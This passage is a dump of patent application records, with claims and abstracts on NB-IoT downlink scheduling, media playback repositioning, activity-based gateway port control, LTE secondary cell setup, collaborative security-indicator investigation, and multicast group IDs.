a memory; and processing circuitry communicatively coupled to the memory, the processing circuitry configured to: receive, over a narrowband Internet of Things downlink, a configuration indicating a subframe in which a communication over a narrowband physical downlink control channel (NB-PDCCH) is scheduled to be communicated; receive the communication over the NB-PDCCH in the subframe Indicated by the configuration; and decode the communication. 24. The wireless device -of claim 23, wherein the processing circuitry is further configured to receive a message during a repetition period of a first time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control, channel (NB-PDCCH) or the NB-PDSCH, each time frame of the plurality of time frames comprising a repetition period and a gap. 25. The wireless device of claim 24, wherein at least a time frame of the plurality of time frames is aligned with the subframe. 26. The wireless device of claim 24, wherein the processing circuitry is further configured to receive a message during a gap of a first time frame of a plurality of time frames of a transmission time of a narrowband physical downlink control channel (NB-PDCCH) or a narrowband physical downlink shared channel (NB-PDSCH), each time frame of the plurality of time frames comprising a repetition period and a gap. 27. The wireless device of claim 23, wherein the configuration is communicated by an eNodeB. 28. The wireless device of claim 23, wherein the wireless device assigned to a coverage level based on a number of repeated transmissions communicated before the wireless device communicates an acknowledgment. 29. The wireless device of claim 23, wherein a number of repeated transmissions to reach the wireless device is greater than a number of repeated transmissions to reach a second wireless device assigned to a different coverage level than the wireless device. 30. A method comprising:
receiving, over a narrowband Internet of Things downlink, a configuration indicating a subframe in which a communication over a narrowband physical downlink control channel (NB-PDCCH) is scheduled to be communicated; receiving communication over the NB-PDCCH in the subframe indicated by the configuration; and decoding the communication. 31-36. (canceled) | 2,400 |
9,171 | 9,171 | 16,445,679 | 2,484 | Systems and methods to position and play content. The system renders a first content segment to an output device at an accelerated speed for the first content segment. Next, the system receives a request to play the first content segment from the beginning of the first content segment at a normal speed for the first content segment. Next, the system automatically positions to the beginning of the first content segment based on position information that is associated with the first content segment. Finally, the system renders the first content segment to the output device from the beginning of the first content segment at a normal speed for the first content segment. | 1. A method comprising:
causing presentation of media content at a first combination of direction and speed, the media content including content sequences among which a first sequence includes a reference point; during presentation of the first sequence at the first combination of direction and speed, detecting a request to present the first sequence at a second combination of direction and speed; responsive to the request, causing presentation of the first sequence from the reference point at the second combination of direction and speed and suspending the presentation of the media content at the first combination of direction and speed at a suspension point within the first sequence but different from the reference point; and restarting the suspended presentation of the media content after the caused presentation of the first sequence at the second combination of direction and speed. 2. The method of claim 1, wherein:
the content sequences in the media content include a second sequence; and the restarting of the suspended presentation of the media content includes causing presentation of the second sequence at the first combination of direction and speed. 3. The method of claim 1, wherein:
the restarting of the suspended presentation of the media content is responsive to completion of the caused presentation of the first sequence at the second combination of direction and speed. 4. The method of claim 1, wherein:
the reference point in the first sequence is a beginning of the first sequence. 5. The method of claim 1, wherein:
the first combination of direction and speed and the second combination of direction and speed specify different directions of playback. 6. The method of claim 1, wherein:
the first combination of direction and speed and the second combination of direction and speed specify different speeds of playback. 7. The method of claim 1, wherein:
the first combination of direction and speed and the second combination of direction and speed specify different speeds of playback in a same direction of playback. 8. The method of claim 1, further comprising:
causing presentation of an image contemporaneously with the presentation of the first sequence at the first combination of direction and speed. 9. The method of claim 8, wherein:
the image depicts a scene in the first sequence. 10. The method of claim 8, wherein:
the image indicates a subject of the first sequence. 11. A method comprising
causing presentation of first content at a first combination of direction and speed, the first content including content sequences among which a first sequence includes a reference point; during presentation of the first sequence at the first combination of direction and speed, detecting a request to present second content at a second combination of direction and speed, the second content including a version of the first sequence; responsive to the request, causing presentation of the second content from its beginning at the second combination of direction and speed and suspending the presentation of the first content at the first combination of direction and speed at a suspension point within the first sequence but different from the reference point; and restarting the suspended presentation of the first content after the caused presentation of the second content at the second combination of direction and speed. 12. The method of claim 11, wherein:
the content sequences in the first content include a second sequence; and the restarting of the suspended presentation of the first content includes causing presentation of the second sequence at the first combination of direction and speed. 13. The method of claim 11, wherein:
the restarting of the suspended presentation of the first content is responsive to completion of the caused presentation of the second content at the second combination of direction and speed. 14. The method of claim 11, wherein:
the second content includes a longer version of the first content. 15. The method of claim 11, wherein:
the second content includes a shorter version of the first content. 16. The method of claim 11, wherein:
the second content includes an interactive application. 17. A system comprising:
one or more processors; a render module executable by the one or more processors and configured to cause presentation of first content at a first combination of direction and speed, the first content including content sequences among which a first sequence includes a reference point; and a request module executable by the one or more processors and configured to, during presentation of the first sequence at the first combination of direction and speed, detect a request to present second content at a second combination of direction and speed, the second content including a version of the first sequence; the render module being further configured to, responsive to the request, cause presentation of the second content from its beginning at the second combination of direction and speed and suspend the presentation of the first content at the first combination of direction and speed at a suspension point within the first sequence but different from the reference point; and the render module being further configured to restart the suspended presentation of the first content after the caused presentation of the second content at the second combination of direction and speed. 18. The system of claim 17, wherein:
the render module is configured to restart the suspended presentation of the first content in response to completion of the caused presentation of the second content at the second combination of direction and speed. 19. The system of claim 17, wherein:
the second content includes a version of the first content. 20. The system of claim 17, wherein:
the second content includes an interactive application. | Systems and methods to position and play content. The system renders a first content segment to an output device at an accelerated speed for the first content segment. Next, the system receives a request to play the first content segment from the beginning of the first content segment at a normal speed for the first content segment. Next, the system automatically positions to the beginning of the first content segment based on position information that is associated with the first content segment. Finally, the system renders the first content segment to the output device from the beginning of the first content segment at a normal speed for the first content segment.1. A method comprising:
causing presentation of media content at a first combination of direction and speed, the media content including content sequences among which a first sequence includes a reference point; during presentation of the first sequence at the first combination of direction and speed, detecting a request to present the first sequence at a second combination of direction and speed; responsive to the request, causing presentation of the first sequence from the reference point at the second combination of direction and speed and suspending the presentation of the media content at the first combination of direction and speed at a suspension point within the first sequence but different from the reference point; and restarting the suspended presentation of the media content after the caused presentation of the first sequence at the second combination of direction and speed. 2. The method of claim 1, wherein:
the content sequences in the media content include a second sequence; and the restarting of the suspended presentation of the media content includes causing presentation of the second sequence at the first combination of direction and speed. 3. The method of claim 1, wherein:
the restarting of the suspended presentation of the media content is responsive to completion of the caused presentation of the first sequence at the second combination of direction and speed. 4. The method of claim 1, wherein:
the reference point in the first sequence is a beginning of the first sequence. 5. The method of claim 1, wherein:
the first combination of direction and speed and the second combination of direction and speed specify different directions of playback. 6. The method of claim 1, wherein:
the first combination of direction and speed and the second combination of direction and speed specify different speeds of playback. 7. The method of claim 1, wherein:
the first combination of direction and speed and the second combination of direction and speed specify different speeds of playback in a same direction of playback. 8. The method of claim 1, further comprising:
causing presentation of an image contemporaneously with the presentation of the first sequence at the first combination of direction and speed. 9. The method of claim 8, wherein:
the image depicts a scene in the first sequence. 10. The method of claim 8, wherein:
the image indicates a subject of the first sequence. 11. A method comprising
causing presentation of first content at a first combination of direction and speed, the first content including content sequences among which a first sequence includes a reference point; during presentation of the first sequence at the first combination of direction and speed, detecting a request to present second content at a second combination of direction and speed, the second content including a version of the first sequence; responsive to the request, causing presentation of the second content from its beginning at the second combination of direction and speed and suspending the presentation of the first content at the first combination of direction and speed at a suspension point within the first sequence but different from the reference point; and restarting the suspended presentation of the first content after the caused presentation of the second content at the second combination of direction and speed. 12. The method of claim 11, wherein:
the content sequences in the first content include a second sequence; and the restarting of the suspended presentation of the first content includes causing presentation of the second sequence at the first combination of direction and speed. 13. The method of claim 11, wherein:
the restarting of the suspended presentation of the first content is responsive to completion of the caused presentation of the second content at the second combination of direction and speed. 14. The method of claim 11, wherein:
the second content includes a longer version of the first content. 15. The method of claim 11, wherein:
the second content includes a shorter version of the first content. 16. The method of claim 11, wherein:
the second content includes an interactive application. 17. A system comprising:
one or more processors; a render module executable by the one or more processors and configured to cause presentation of first content at a first combination of direction and speed, the first content including content sequences among which a first sequence includes a reference point; and a request module executable by the one or more processors and configured to, during presentation of the first sequence at the first combination of direction and speed, detect a request to present second content at a second combination of direction and speed, the second content including a version of the first sequence; the render module being further configured to, responsive to the request, cause presentation of the second content from its beginning at the second combination of direction and speed and suspend the presentation of the first content at the first combination of direction and speed at a suspension point within the first sequence but different from the reference point; and the render module being further configured to restart the suspended presentation of the first content after the caused presentation of the second content at the second combination of direction and speed. 18. The system of claim 17, wherein:
the render module is configured to restart the suspended presentation of the first content in response to completion of the caused presentation of the second content at the second combination of direction and speed. 19. The system of claim 17, wherein:
the second content includes a version of the first content. 20. The system of claim 17, wherein:
the second content includes an interactive application. | 2,400 |
9,172 | 9,172 | 15,485,328 | 2,433 | Methods, devices and program products are provided for collecting activity data concerning a local environment from a device associated with the local environment. The method determines, using a processor, an activity state associated with a local environment based on the activity data collected by the device. The method manages, using the processor, an access setting associated with a network port of a network gateway into the local environment based on the activity state. | 1. A method, comprising:
collecting activity data concerning a local environment from a device associated with the local environment; determining, using a processor, an activity state associated with a local environment based on the activity data collected by the device; and managing, using the processor, an access setting associated with a network port of a network gateway into the local environment based on the activity state. 2. The method of claim 1, wherein the managing further comprises changing the access setting between first and second access levels based on the activity data. 3. The method of claim 1, wherein the device represents a sensor to monitor at least a portion of the local environment and provide, as the activity data, an indication of whether one or more individuals are present in the local environment. 4. The method of claim 1, wherein the device represents a portable device to provide, as the activity data, sleep state information for a user associated with the wearable device. 5. The method of claim 1, wherein the managing further comprises disabling the network port when the activity state corresponds to a sleep state. 6. The method of claim 1, further comprising accessing one or more rules that define the access setting associated with the network port based on the activity state. 7. The method of claim 6, further comprising receiving incoming data traffic from an external source, the data traffic directed to the network port of the network gateway into the local environment, and determining whether to block the data traffic based on the access setting. 8. The method of claim 1, wherein the network gateway includes first and second ports, the managing comprising individually managing the first and second ports to have different access settings based on the activity state. 9. Apparatus, comprising:
a network port into a local environment, the network port to receive data traffic directed to one or more computing devices within a local environment; memory storing program instructions; and a processor, in response to execution of the program instructions, to perform the following:
collect activity data concerning the local environment;
determine an activity state associated with a local environment based on the activity data collected by the device; and
manage an access setting for the network port into the local environment based on the activity state. 10. The apparatus of claim 9, further comprising a wireless router, wherein the network port represents a network port on the wireless router. 11. The apparatus of claim 9, wherein the processor, in response to execution of the program instructions, routes incoming data traffic through the network port to a predetermined computing device within the local environment. 12. The apparatus of claim 9, wherein the device represents a portable device that provides, as the activity data, sleep state information for a user associated with the wearable device. 13. The apparatus of claim 9, wherein the device represents a sensor to monitor at least a portion of the local environment and provide, as the activity data, an indication of whether one or more individuals are present in the local environment. 14. The apparatus of claim 9, wherein the processor, in response to execution of the program instructions, changes the access setting between first and second access levels based on the activity data. 15. The apparatus of claim 9, wherein the processor, in response to execution of the program instructions, disables the network port when the activity state corresponds to a sleep state. 16. The apparatus of claim 9, wherein the memory stores one or more rules that define the access setting for the network port based on the activity state. 17. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to:
collect activity data concerning a local environment from a device associated with the local environment; determine, using a processor, an activity state associated with a local environment based on the activity data collected by the device; and manage, using the processor, an access setting associated with a network port of a network gateway into the local environment based on the activity state. 18. The computer program product of claim 17, wherein the manage further comprises to change the access setting between first and second access levels based on the activity data. 19. The computer program product of claim 17, wherein the device represents a portable device to provide, as the activity data, sleep state information for a user associated with the wearable device. 20. The computer program product of claim 17, wherein the manage further comprises to disable the network port when the activity state corresponds to a sleep state. | Methods, devices and program products are provided for collecting activity data concerning a local environment from a device associated with the local environment. The method determines, using a processor, an activity state associated with a local environment based on the activity data collected by the device. The method manages, using the processor, an access setting associated with a network port of a network gateway into the local environment based on the activity state.1. A method, comprising:
collecting activity data concerning a local environment from a device associated with the local environment; determining, using a processor, an activity state associated with a local environment based on the activity data collected by the device; and managing, using the processor, an access setting associated with a network port of a network gateway into the local environment based on the activity state. 2. The method of claim 1, wherein the managing further comprises changing the access setting between first and second access levels based on the activity data. 3. The method of claim 1, wherein the device represents a sensor to monitor at least a portion of the local environment and provide, as the activity data, an indication of whether one or more individuals are present in the local environment. 4. The method of claim 1, wherein the device represents a portable device to provide, as the activity data, sleep state information for a user associated with the wearable device. 5. The method of claim 1, wherein the managing further comprises disabling the network port when the activity state corresponds to a sleep state. 6. The method of claim 1, further comprising accessing one or more rules that define the access setting associated with the network port based on the activity state. 7. The method of claim 6, further comprising receiving incoming data traffic from an external source, the data traffic directed to the network port of the network gateway into the local environment, and determining whether to block the data traffic based on the access setting. 8. The method of claim 1, wherein the network gateway includes first and second ports, the managing comprising individually managing the first and second ports to have different access settings based on the activity state. 9. Apparatus, comprising:
a network port into a local environment, the network port to receive data traffic directed to one or more computing devices within a local environment; memory storing program instructions; and a processor, in response to execution of the program instructions, to perform the following:
collect activity data concerning the local environment;
determine an activity state associated with a local environment based on the activity data collected by the device; and
manage an access setting for the network port into the local environment based on the activity state. 10. The apparatus of claim 9, further comprising a wireless router, wherein the network port represents a network port on the wireless router. 11. The apparatus of claim 9, wherein the processor, in response to execution of the program instructions, routes incoming data traffic through the network port to a predetermined computing device within the local environment. 12. The apparatus of claim 9, wherein the device represents a portable device that provides, as the activity data, sleep state information for a user associated with the wearable device. 13. The apparatus of claim 9, wherein the device represents a sensor to monitor at least a portion of the local environment and provide, as the activity data, an indication of whether one or more individuals are present in the local environment. 14. The apparatus of claim 9, wherein the processor, in response to execution of the program instructions, changes the access setting between first and second access levels based on the activity data. 15. The apparatus of claim 9, wherein the processor, in response to execution of the program instructions, disables the network port when the activity state corresponds to a sleep state. 16. The apparatus of claim 9, wherein the memory stores one or more rules that define the access setting for the network port based on the activity state. 17. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to:
collect activity data concerning a local environment from a device associated with the local environment; determine, using a processor, an activity state associated with a local environment based on the activity data collected by the device; and manage, using the processor, an access setting associated with a network port of a network gateway into the local environment based on the activity state. 18. The computer program product of claim 17, wherein the manage further comprises to change the access setting between first and second access levels based on the activity data. 19. The computer program product of claim 17, wherein the device represents a portable device to provide, as the activity data, sleep state information for a user associated with the wearable device. 20. The computer program product of claim 17, wherein the manage further comprises to disable the network port when the activity state corresponds to a sleep state. | 2,400 |
9,173 | 9,173 | 14,009,913 | 2,478 | Embodiments provide a method for initializing a secondary cell in a cellular communication system. The method may comprise: receiving from a base station a Radio Resource Control RRC configuration request for the secondary cell to perform a RRC configuration; and in response to receiving the RRC configuration request, performing uplink synchronization with the base station in the secondary cell. | 1. A method for initializing a secondary cell in a cellular communication system, comprising:
receiving from a base station a Radio Resource Control RRC configuration request for the secondary cell to perform the RRC configuration; and performing, in response to receiving the RRC configuration request, uplink synchronization with the base station in the secondary cell. 2. The method according to claim 1, wherein performing, in response to receiving the RRC configuration request, uplink synchronization with the base station in the secondary cell comprises:
receiving a PDCCH order signaling from the base station; and performing uplink synchronization with the base station in the secondary cell based on the PDCCH order signaling. 3. The method according to claim 2, wherein performing uplink synchronization with the base station in the secondary cell based on the PDCCH order signaling comprises:
identifying different preambles reserved by the PDCCH order signaling for different secondary cells to determine the secondary cells for uplink synchronization; or identifying a field of CIF in the PDCCH order signaling to determine the secondary cells for uplink synchronization; or determining, based on the PDCCH order signaling, whether to perform uplink synchronization merely for specific secondary cells or for all secondary cells that have not performed the uplink synchronization. 4. The method according to claim 1, wherein performing uplink synchronization with the base station in the secondary cell comprises:
determining whether to perform the uplink synchronization with the base station in the secondary cell based on the RRC configuration request. 5. The method according to claim 1, further comprising:
determining whether a dedicated preamble has been set in the RRC configuration request; in response to determining that a dedicated preamble has been set, performing a non-contention uplink synchronization process; and in response to determining that no dedicated preamble has been set, performing a contention uplink synchronization process. 6. The method according to claim 1, further comprising:
sending to the base station a message that a RRC configuration is completed, wherein the message is sent independent of performing the uplink synchronization. 7. The method according to claim 1, further comprising:
after performing the uplink synchronization, sending to the base station a message that a RRC configuration is completed. 8. The method according to claim 1, wherein performing uplink synchronization with the base station in the secondary cell comprises:
determining, based on the RRC configuration request, whether to use Timing Advance TA information of a secondary cell or primary cell which has been configured; and in response to determining not to use Timing Advance TA information of a secondary cell which has been configured, performing a random access process for the secondary cell. 9. The method according to claim 1, wherein performing uplink synchronization with the base station in the secondary cell comprises:
determining whether it is necessary to configure a plurality of secondary cells based on the RRC configuration request; in response to determining that it is necessary to configure a plurality of secondary cells, determining whether the same TA information is used for the plurality of secondary cells; if the same TA information is used for the plurality of secondary cells, performing random access processes simultaneously or one by one for each of the plurality of secondary cells, and obtaining TA information based on the first successfully-performed random access process for use in uplink transmission of each secondary cell; and if the same TA information is not used for the plurality of secondary cells, performing random access processes simultaneously or one by one for each of the plurality of secondary cells to obtain TA information corresponding to each secondary cell for use in uplink transmission of the each secondary cell. 10. The method according to claim 1, wherein after receiving the RRC configuration request, if a user equipment fails to perform uplink synchronization with the base station in the secondary cell or the uplink synchronization fails, contents for the secondary cell in cell active MAC signaling are ignored and/or downlink measurement and report for the secondary cell are not performed. 11. A method for initializing a secondary cell in a cellular communication system, comprising:
sending to a user equipment a Radio Resource Control RRC configuration request so that the user equipment performs a RRC configuration and performs uplink synchronization between the user equipment and a base station in the secondary cell. 12. The method according to claim 11, further comprising:
sending to the user equipment a PDCCH order signaling so that the uplink synchronization between the user equipment and the base station in the secondary cell is performed. 13. The method according to claim 11, wherein sending to the user equipment a PDCCH order signaling comprises:
reserving different preambles in the PDCCH order signaling for different secondary cells to identify a secondary cell to perform the uplink synchronization; or setting a field of CIF in the PDCCH order signaling to identify the secondary cells for uplink synchronization; or setting the PDCCH order signaling to indicate whether to perform the uplink synchronization merely for specific secondary cells or for all secondary cells that have not performed the uplink synchronization. 14.-19. (canceled) 20. A user equipment for initializing a secondary cell in a cellular communication system, comprising:
receiving means configured to receive from a base station a Radio Resource Control RRC configuration request for the secondary cell to perform the RRC configuration; and synchronizing means configured to perform, in response to receiving the RRC configuration request, uplink synchronization with the base station in the secondary cell. 21.-29. (canceled) 30. A base station for initializing a secondary cell in a cellular communication system, comprising sending means, wherein the sending means comprises:
an RRC configuration request sending unit configured to send a Radio Resource Control RRC configuration request to a user equipment so that the user equipment performs a RRC configuration and performs uplink synchronization between the user equipment and a base station in the secondary cell. 31.-38. (canceled) | Embodiments provide a method for initializing a secondary cell in a cellular communication system. The method may comprise: receiving from a base station a Radio Resource Control RRC configuration request for the secondary cell to perform a RRC configuration; and in response to receiving the RRC configuration request, performing uplink synchronization with the base station in the secondary cell.1. A method for initializing a secondary cell in a cellular communication system, comprising:
receiving from a base station a Radio Resource Control RRC configuration request for the secondary cell to perform the RRC configuration; and performing, in response to receiving the RRC configuration request, uplink synchronization with the base station in the secondary cell. 2. The method according to claim 1, wherein performing, in response to receiving the RRC configuration request, uplink synchronization with the base station in the secondary cell comprises:
receiving a PDCCH order signaling from the base station; and performing uplink synchronization with the base station in the secondary cell based on the PDCCH order signaling. 3. The method according to claim 2, wherein performing uplink synchronization with the base station in the secondary cell based on the PDCCH order signaling comprises:
identifying different preambles reserved by the PDCCH order signaling for different secondary cells to determine the secondary cells for uplink synchronization; or identifying a field of CIF in the PDCCH order signaling to determine the secondary cells for uplink synchronization; or determining, based on the PDCCH order signaling, whether to perform uplink synchronization merely for specific secondary cells or for all secondary cells that have not performed the uplink synchronization. 4. The method according to claim 1, wherein performing uplink synchronization with the base station in the secondary cell comprises:
determining whether to perform the uplink synchronization with the base station in the secondary cell based on the RRC configuration request. 5. The method according to claim 1, further comprising:
determining whether a dedicated preamble has been set in the RRC configuration request; in response to determining that a dedicated preamble has been set, performing a non-contention uplink synchronization process; and in response to determining that no dedicated preamble has been set, performing a contention uplink synchronization process. 6. The method according to claim 1, further comprising:
sending to the base station a message that a RRC configuration is completed, wherein the message is sent independent of performing the uplink synchronization. 7. The method according to claim 1, further comprising:
after performing the uplink synchronization, sending to the base station a message that a RRC configuration is completed. 8. The method according to claim 1, wherein performing uplink synchronization with the base station in the secondary cell comprises:
determining, based on the RRC configuration request, whether to use Timing Advance TA information of a secondary cell or primary cell which has been configured; and in response to determining not to use Timing Advance TA information of a secondary cell which has been configured, performing a random access process for the secondary cell. 9. The method according to claim 1, wherein performing uplink synchronization with the base station in the secondary cell comprises:
determining whether it is necessary to configure a plurality of secondary cells based on the RRC configuration request; in response to determining that it is necessary to configure a plurality of secondary cells, determining whether the same TA information is used for the plurality of secondary cells; if the same TA information is used for the plurality of secondary cells, performing random access processes simultaneously or one by one for each of the plurality of secondary cells, and obtaining TA information based on the first successfully-performed random access process for use in uplink transmission of each secondary cell; and if the same TA information is not used for the plurality of secondary cells, performing random access processes simultaneously or one by one for each of the plurality of secondary cells to obtain TA information corresponding to each secondary cell for use in uplink transmission of the each secondary cell. 10. The method according to claim 1, wherein after receiving the RRC configuration request, if a user equipment fails to perform uplink synchronization with the base station in the secondary cell or the uplink synchronization fails, contents for the secondary cell in cell active MAC signaling are ignored and/or downlink measurement and report for the secondary cell are not performed. 11. A method for initializing a secondary cell in a cellular communication system, comprising:
sending to a user equipment a Radio Resource Control RRC configuration request so that the user equipment performs a RRC configuration and performs uplink synchronization between the user equipment and a base station in the secondary cell. 12. The method according to claim 11, further comprising:
sending to the user equipment a PDCCH order signaling so that the uplink synchronization between the user equipment and the base station in the secondary cell is performed. 13. The method according to claim 11, wherein sending to the user equipment a PDCCH order signaling comprises:
reserving different preambles in the PDCCH order signaling for different secondary cells to identify a secondary cell to perform the uplink synchronization; or setting a field of CIF in the PDCCH order signaling to identify the secondary cells for uplink synchronization; or setting the PDCCH order signaling to indicate whether to perform the uplink synchronization merely for specific secondary cells or for all secondary cells that have not performed the uplink synchronization. 14.-19. (canceled) 20. A user equipment for initializing a secondary cell in a cellular communication system, comprising:
receiving means configured to receive from a base station a Radio Resource Control RRC configuration request for the secondary cell to perform the RRC configuration; and synchronizing means configured to perform, in response to receiving the RRC configuration request, uplink synchronization with the base station in the secondary cell. 21.-29. (canceled) 30. A base station for initializing a secondary cell in a cellular communication system, comprising sending means, wherein the sending means comprises:
an RRC configuration request sending unit configured to send a Radio Resource Control RRC configuration request to a user equipment so that the user equipment performs a RRC configuration and performs uplink synchronization between the user equipment and a base station in the secondary cell. 31.-38. (canceled) | 2,400 |
9,174 | 9,174 | 15,545,099 | 2,438 | Examples relate to collaborative investigation of security indicators. The examples disclosed herein enable presenting, via a user interface, community-based threat information associated with a security indicator to a user. The community-based threat information may comprise investigation results that are obtained from a community of users for the security indicator, and an indicator score that is determined based on the investigation results. The examples further enable obtaining an investigation result from the user and updating the indicator score based on the investigation result. | 1. A method for collaborative investigation of security indicators, the method comprising:
presenting, via a user interface, community-based threat information associated with a security indicator to a user, the community-based threat information comprising investigation results that are obtained from a community of users for the security indicator, and an indicator score that is determined based on the investigation results; obtaining an investigation result from the user; and updating the indicator score based on the investigation result. 2. The method of claim 1, wherein the community-based threat information comprises information related to the community of users and information related to the security indicator. 3. The method of claim 2, further comprising:
receiving, via the user interface, an indication that the security indicator is under investigation by the user; and updating the investigation status based on the indication that the security indicator is under investigation by the user. 4. The method of claim 1, further comprising:
detecting when event data includes an event that matches at least one security indicator of a blacklist; and generating a security alert based on the detection. 5. The method of claim 4, further comprising:
determining whether to remove the security indicator from the blacklist based on the indicator score. 6. The method of claim 4, further comprising:
adding the investigation result to the community-based threat information; and updating the indicator score based on at least one parameter, the at least one parameter comprising the total number of the investigation results, the number of the investigation results indicating that the security indicator is malicious, information related to the community of users, and information related to the security indicator. 7. A non-transitory machine-readable storage medium comprising instructions executable by a processor of a computing device for collaborative investigation of security indicators, the machine-readable storage medium comprising:
instructions to cause a display of community-based threat information associated with a security indicator, the community-based threat information comprising a collaborative set of investigation results that is obtained from a plurality of users for the security indicator and an indicator score; instructions to obtain an investigation result indicating whether the security indicator is malicious; instructions to include the investigation result in the collaborative set; and instructions to determine the indicator score based on at least one parameter, the at least one parameter comprising the number of the investigation results in the collaborative set that indicate that the security indicator is malicious. 8. The non-transitory machine-readable storage medium of claim 7, wherein the at least one parameter comprises the total number of the investigation results in the collaborative set, information related to the plurality of users, and information related to the security indicator. 9. The non-transitory machine-readable storage medium of claim 7, further comprising:
instructions to determine whether event data includes an event that corresponds to the security indicator of a blacklist; and in response to determining that the event data includes the event that corresponds to the security indicator of the blacklist, instructions to generate a security alert. 10. The non-transitory machine-readable storage medium of claim 7, further comprising:
instructions to compare the indicator score with a threshold; and instructions to exclude the security indicator from a blacklist based on the comparison. 11. The non-transitory machine-readable storage medium of claim 7, further comprising:
instructions to compare the total number of the investigation results in the collaborative set with a threshold; and instructions to exclude the security indicator from a blacklist based on the comparison. 12. A system for collaborative investigation of security indicators comprising:
a processor that: generates a security alert based on a detection of a security indicator in event data, wherein a blacklist comprises a plurality of security indicators; in response to the security alert, obtains community-based threat information associated with the security indicator, the community-based threat information comprising a plurality of investigation results that are obtained from a plurality of users for the security indicator and an indicator score that is determined based on the plurality of investigation results; obtains a new investigation result from a user, the new investigation result indicating whether the security indicator is malicious; modifies the indicator score based on the new investigation result; and determines whether to remove the security indicator from the blacklist based on the indicator score. 13. The system of claim 12, the processor that:
determines the indicator score based on at least one parameter, the at least one parameter comprising the total number of the plurality of investigation results, the number of the investigation results in the plurality of investigation results that indicate that the security indicator is malicious, information related to the community of users, and information related to the security indicator. 14. The system of claim 12, the processor that:
determines whether a change to the community-based threat information occurs; and in response to determining that the change to the community-based threat information occurs, generates a notification that informs at least one of the plurality of users of the change. 15. The system of claim 12, the processor that:
determines a user score associated with the user based on at least one investigation result that the user has previously submitted; and determines the indicator score based on the user score. | Examples relate to collaborative investigation of security indicators. The examples disclosed herein enable presenting, via a user interface, community-based threat information associated with a security indicator to a user. The community-based threat information may comprise investigation results that are obtained from a community of users for the security indicator, and an indicator score that is determined based on the investigation results. The examples further enable obtaining an investigation result from the user and updating the indicator score based on the investigation result.1. A method for collaborative investigation of security indicators, the method comprising:
presenting, via a user interface, community-based threat information associated with a security indicator to a user, the community-based threat information comprising investigation results that are obtained from a community of users for the security indicator, and an indicator score that is determined based on the investigation results; obtaining an investigation result from the user; and updating the indicator score based on the investigation result. 2. The method of claim 1, wherein the community-based threat information comprises information related to the community of users and information related to the security indicator. 3. The method of claim 2, further comprising:
receiving, via the user interface, an indication that the security indicator is under investigation by the user; and updating the investigation status based on the indication that the security indicator is under investigation by the user. 4. The method of claim 1, further comprising:
detecting when event data includes an event that matches at least one security indicator of a blacklist; and generating a security alert based on the detection. 5. The method of claim 4, further comprising:
determining whether to remove the security indicator from the blacklist based on the indicator score. 6. The method of claim 4, further comprising:
adding the investigation result to the community-based threat information; and updating the indicator score based on at least one parameter, the at least one parameter comprising the total number of the investigation results, the number of the investigation results indicating that the security indicator is malicious, information related to the community of users, and information related to the security indicator. 7. A non-transitory machine-readable storage medium comprising instructions executable by a processor of a computing device for collaborative investigation of security indicators, the machine-readable storage medium comprising:
instructions to cause a display of community-based threat information associated with a security indicator, the community-based threat information comprising a collaborative set of investigation results that is obtained from a plurality of users for the security indicator and an indicator score; instructions to obtain an investigation result indicating whether the security indicator is malicious; instructions to include the investigation result in the collaborative set; and instructions to determine the indicator score based on at least one parameter, the at least one parameter comprising the number of the investigation results in the collaborative set that indicate that the security indicator is malicious. 8. The non-transitory machine-readable storage medium of claim 7, wherein the at least one parameter comprises the total number of the investigation results in the collaborative set, information related to the plurality of users, and information related to the security indicator. 9. The non-transitory machine-readable storage medium of claim 7, further comprising:
instructions to determine whether event data includes an event that corresponds to the security indicator of a blacklist; and in response to determining that the event data includes the event that corresponds to the security indicator of the blacklist, instructions to generate a security alert. 10. The non-transitory machine-readable storage medium of claim 7, further comprising:
instructions to compare the indicator score with a threshold; and instructions to exclude the security indicator from a blacklist based on the comparison. 11. The non-transitory machine-readable storage medium of claim 7, further comprising:
instructions to compare the total number of the investigation results in the collaborative set with a threshold; and instructions to exclude the security indicator from a blacklist based on the comparison. 12. A system for collaborative investigation of security indicators comprising:
a processor that: generates a security alert based on a detection of a security indicator in event data, wherein a blacklist comprises a plurality of security indicators; in response to the security alert, obtains community-based threat information associated with the security indicator, the community-based threat information comprising a plurality of investigation results that are obtained from a plurality of users for the security indicator and an indicator score that is determined based on the plurality of investigation results; obtains a new investigation result from a user, the new investigation result indicating whether the security indicator is malicious; modifies the indicator score based on the new investigation result; and determines whether to remove the security indicator from the blacklist based on the indicator score. 13. The system of claim 12, the processor that:
determines the indicator score based on at least one parameter, the at least one parameter comprising the total number of the plurality of investigation results, the number of the investigation results in the plurality of investigation results that indicate that the security indicator is malicious, information related to the community of users, and information related to the security indicator. 14. The system of claim 12, the processor that:
determines whether a change to the community-based threat information occurs; and in response to determining that the change to the community-based threat information occurs, generates a notification that informs at least one of the plurality of users of the change. 15. The system of claim 12, the processor that:
determines a user score associated with the user based on at least one investigation result that the user has previously submitted; and determines the indicator score based on the user score. | 2,400 |
9,175 | 9,175 | 15,710,708 | 2,477 | Methods and apparatus for transmission of data streams using a multicast packet format based on group identifiers (Group IDs) to deliver data to multiple recipient stations (STAs). Using Group IDs, an access point (AP) assigns multiple STAs to one or more groups, and uniquely assigns each STA to a particular position within the group, such that it can receive a requested data stream. A Group ID management action frame provided by the AP to an individual STA indicates to which group (or groups) the STA is assigned and the STA's position within the group, with which information the STA can determine whether a packet is intended for the STA and which portion of the packet to decode in order to receive requested data streams. | 1. A method for multicast transmission from a wireless access point (AP) to a plurality of wireless stations (STAs), the method comprising:
by the wireless AP: providing to the plurality of wireless STAs an association of a plurality of data streams with one or more Group Identifiers (IDs) for multicast transmission; receiving a request from a wireless STA of the plurality of wireless STAs to receive a data stream of the plurality of data streams; sending to the wireless STA a management message that assigns the wireless STA to a Group ID of the one of more Group IDs, the Group ID corresponding to the data stream; and transmitting to the plurality of wireless STAs the data stream using data messages that include multiple data streams aggregated together based on the one or more Group IDs. 2. The method of claim 1, further comprising:
